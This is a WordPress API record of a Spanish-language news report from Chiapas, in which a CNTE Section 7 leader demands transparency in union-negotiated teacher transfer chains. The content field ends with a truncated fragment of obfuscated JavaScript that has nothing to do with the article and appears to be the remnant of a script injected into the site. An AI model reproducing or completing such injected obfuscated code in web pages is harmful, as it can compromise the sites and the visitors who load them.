{"id":23064,"date":"2025-07-19T06:44:48","date_gmt":"2025-07-19T06:44:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23064"},"modified":"2025-07-19T06:44:49","modified_gmt":"2025-07-19T06:44:49","slug":"exige-cnte-transparencia-en-cadenas-de-cambios","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23064","title":{"rendered":"Exige CNTE transparencia en cadenas de cambios"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000230547-1024x576.jpg\" alt=\"\" class=\"wp-image-23065\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000230547-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000230547-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000230547-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000230547.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>18 de julio del 2025. Tuxtla Guti\u00e9rrez.- Isael Gonz\u00e1lez V\u00e1zquez secretario de la Secci\u00f3n 7 de la CNTE, inform\u00f3 que, tras semanas de negociaciones, se emitieron convocatorias para las cadenas de cambio de manera bilateral, en coordinaci\u00f3n con el Sindicato Nacional de Trabajadores de la Educaci\u00f3n (SNTE).<\/p>\n\n\n\n<p>Sin embargo, los maestros exigen transparencia total y cero tr\u00e1fico de influencias en el proceso.<\/p>\n\n\n\n<p>Gonz\u00e1lez V\u00e1zquez detall\u00f3 que, en los pr\u00f3ximos d\u00edas, se deben ajustar los \u00faltimos detalles para que, a partir de la pr\u00f3xima semana, inicien formalmente las cadenas de cambio, tal como lo establecen las convocatorias.<\/p>\n\n\n\n<p>Ya se publicaron los listados preliminares con las fechas correspondientes para presentar impugnaciones. El l\u00edder magisterial confi\u00f3 en que este periodo haya servido para denunciar cualquier irregularidad.<\/p>\n\n\n\n<p>\u201cLas cadenas se realizar\u00e1n de manera abierta y transparente, incluso con la posibilidad de que los docentes graben las sesiones para evitar opacidad\u201d, afirm\u00f3. Adem\u00e1s, advirti\u00f3 que no se permitir\u00e1 que las autoridades aparten espacios para sus allegados, como sucedi\u00f3 en administraciones anteriores.<\/p>\n\n\n\n<p>Las cadenas de cambio se llevar\u00e1n a cabo \u00fanicamente con los maestros que se inscribieron y presentaron impugnaciones. Durante las sesiones, se dar\u00e1 a conocer el escalaf\u00f3n general, un punto clave para garantizar equidad en las reubicaciones.<\/p>\n\n\n\n<p>Gonz\u00e1lez V\u00e1zquez revel\u00f3 que solicitaron una reuni\u00f3n con autoridades educativas este viernes para ultimar los detalles y asegurar que el proceso inicie sin contratiempos el pr\u00f3ximo lunes.<\/p>\n\n\n\n<p>El dirigente hizo un llamado a todos los docentes a mantenerse atentos al desarrollo de las cadenas de cambio.<br>Aclar\u00f3 que este mecanismo no consiste en cambios de centro a centro, sino en un proceso escalafonario regulado.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 18 de julio del 2025. Tuxtla Guti\u00e9rrez.- Isael Gonz\u00e1lez V\u00e1zquez secretario de la Secci\u00f3n 7 de la CNTE, inform\u00f3 que, tras semanas de negociaciones, se emitieron convocatorias para las cadenas de cambio de manera bilateral, en coordinaci\u00f3n con el Sindicato Nacional de Trabajadores de la Educaci\u00f3n (SNTE). Sin embargo, los maestros exigen transparencia &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23065,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-23064","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23064","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23064"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23064\/revisions"}],"predecessor-version":[{"id":23066,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23064\/revisions\/23066"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23065"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23064"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23064"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23064"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}